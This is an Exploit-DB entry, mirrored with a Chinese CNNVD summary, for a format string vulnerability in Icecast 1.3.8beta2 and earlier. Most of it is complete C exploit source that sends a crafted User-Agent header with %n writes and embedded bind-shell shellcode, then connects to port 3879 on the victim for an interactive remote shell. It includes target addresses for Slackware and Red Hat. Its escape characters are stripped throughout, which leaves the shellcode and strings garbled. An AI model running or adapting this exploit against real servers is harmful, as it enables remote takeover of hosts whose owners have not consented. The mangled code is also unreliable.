https://www.exploit-db.com/exploits/20582
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-090

Icecast1.3.8beta2及其之前版本的print_client存在格式化字符串漏洞。远程攻击者可以利用该漏洞执行任意命令。

source: http://www.securityfocus.com/bid/2264/info

Versions of icecast up to and including 1.3.8 beta2 exhibit a format string vulnerability in the print_client()function of utility.c. A malicious user can cause the *printf function to overwrite memory at possibly arbitrary addresses. 

* Exploits format string vulnerability in icecast 1.3.7
 * Coded by |CyRaX| <[email protected]>
 * Packet Knights Crew http://www.pkcrew.org/
 *
*/




#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <netinet/in.h>

char code[]=
"x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"
"x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"
"x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0"
"x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd"
"x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9"
"xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75"
"x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08"
"x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh";

unsigned long ip;
void try_it();

struct target{
   char *name;
   char *addr1;
   char *addr2;
   char *addr3;
   char *addr4;
   u_short one;
   u_short two;
   u_short three;
   u_short xx;
   u_short pad;

};



int main(int argc,char **argv){
   int s,i,sel;
   struct sockaddr_in sk;
   char sndbuff[9000],xx[9000],one[300],two[300],three[300],nop[1000],pad[100];
   struct target tl[]={
        {
           "icecast-1.3.7.tar.gz compiled on Slackware 7.0",
           "x1cxdbx5fxbf",
           "x1dxdbx5fxbf",
           "x1exdbx5fxbf",
           "x1fxdbx5fxbf",
           123,
           136,
           96,
           2076,
           5
        },
        {
           "icecast-1.3.7.tar.gz compiled on Redhat 7.0",
           "xd8xd8x5fxbf",
           "xd9xd8x5fxbf",
           "xdaxd8x5fxbf",
           "xdbxd8x5fxbf",
           116,
           159,
           96,
           2074,
           3
        }
   };

   printf("Icecast 1.3.7 format bug exploit by |CyRaX| <[email protected]");
   printf("Packet Knights Crew | http://www.pkcrew.org/n");

   if(argc<4){
      printf("Usage : ./PKCicecast-ex <target> <port> <type>n");
      printf("types are :n");
      for(i=0;i<(sizeof(tl)/sizeof(struct target));i++){
         printf("%2i : %sn",i,tl[i].name);
      }
      exit(0);
   }

   sel=atoi(argv[3]);
   memset(sndbuff,0,9000);
   memset(xx,0,9000);
   memset(one,0,300);
   memset(two,0,300);
   memset(three,0,300);
   memset(pad,0,100);
   memset(nop,'x90',1000);
   nop[1000]=0;

   s=socket(AF_INET,SOCK_STREAM,0);

   ip=inet_addr(argv[1]);
   sk.sin_addr.s_addr=ip;
   sk.sin_port=htons(atoi(argv[2]));
   sk.sin_family=AF_INET;
   connect(s,(struct sockaddr *)&sk,sizeof(sk));
   strcpy(sndbuff,"GET / HTTP/1.0n");
   send(s,sndbuff,strlen(sndbuff),0);

   for(i=0;i<=(tl[sel].xx*3);i+=3){
      memcpy(xx+i,"%8x",3);
   }
   memset(one,'x90',tl[sel].one);
   memset(two,'x90',tl[sel].two);
   memset(three,'x90',tl[sel].three);
   memcpy(one+strlen(one)-2,"xebx02",2);
   memcpy(two+strlen(two)-2,"xebx02",2);
   memcpy(three+strlen(three)-2,"xebx02",2);
   memset(pad,'X',tl[sel].pad);
   sprintf(sndbuff,"User-agent: %s"
   "%s"
   "%s"
   "%s"
   "%s"
   "%s" /* the %8x */
   "%%n"
   "%s%%n"
   "%s%%n"
   "%s%%n"
   "%s"
   "%snn"
   ,pad,tl[sel].addr1,tl[sel].addr2,tl[sel].addr3,tl[sel].addr4,
           xx,one,two,three,nop,code);
   send(s,sndbuff,strlen(sndbuff),0);
   printf("We must sleep for 120 seconds. Waiting for icecast to do the statisticn");
   alarm(120);
   signal(SIGALRM,try_it);
   while(1)recv(s,sndbuff,9000,0);
}

void try_it(){
   struct sockaddr_in sk;
   int s;
   char buff[1000];
   fd_set fs;

   printf("trying!n");
   sk.sin_addr.s_addr=ip;
   sk.sin_port=htons(3879);
   sk.sin_family=AF_INET;
   s=socket(AF_INET,SOCK_STREAM,0);
   if(connect(s,(struct sock_addr*)&sk,sizeof(sk))==-1){
      printf("sorry.. it did'nt workedn");
      exit(0);
   }
   strcpy(buff,"uname -a;idn");
   send(s,buff,strlen(buff),0);
   while(1){
      memset(buff,0,1000);
      FD_ZERO(&fs);
      FD_SET(0,&fs);
      FD_SET(s,&fs);
      select(s+1,&fs,NULL,NULL,NULL);
      if(FD_ISSET(0,&fs)){
         fgets(buff,1000,stdin);
         send(s,buff,strlen(buff),0);
      }
      if(FD_ISSET(s,&fs)){
         recv(s,buff,1000,0);
         printf("%s",buff);
      }
   }

}

来源:BID
名称:2264
链接:http://www.securityfocus.com/bid/2264
来源:REDHAT
名称:RHSA-2001:004
链接:http://www.redhat.com/support/errata/RHSA-2001-004.html
来源:CONECTIVA
名称:CLA-2001:374
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000374
来源:BUGTRAQ
名称:20010121[pkc]formatbugsinicecast1.3.8b2andprior
链接:http://archives.neohapsis.com/archives/bugtraq/2001-01/0348.html
来源:XF
名称:icecast-format-string
链接:http://xforce.iss.net/static/5978.php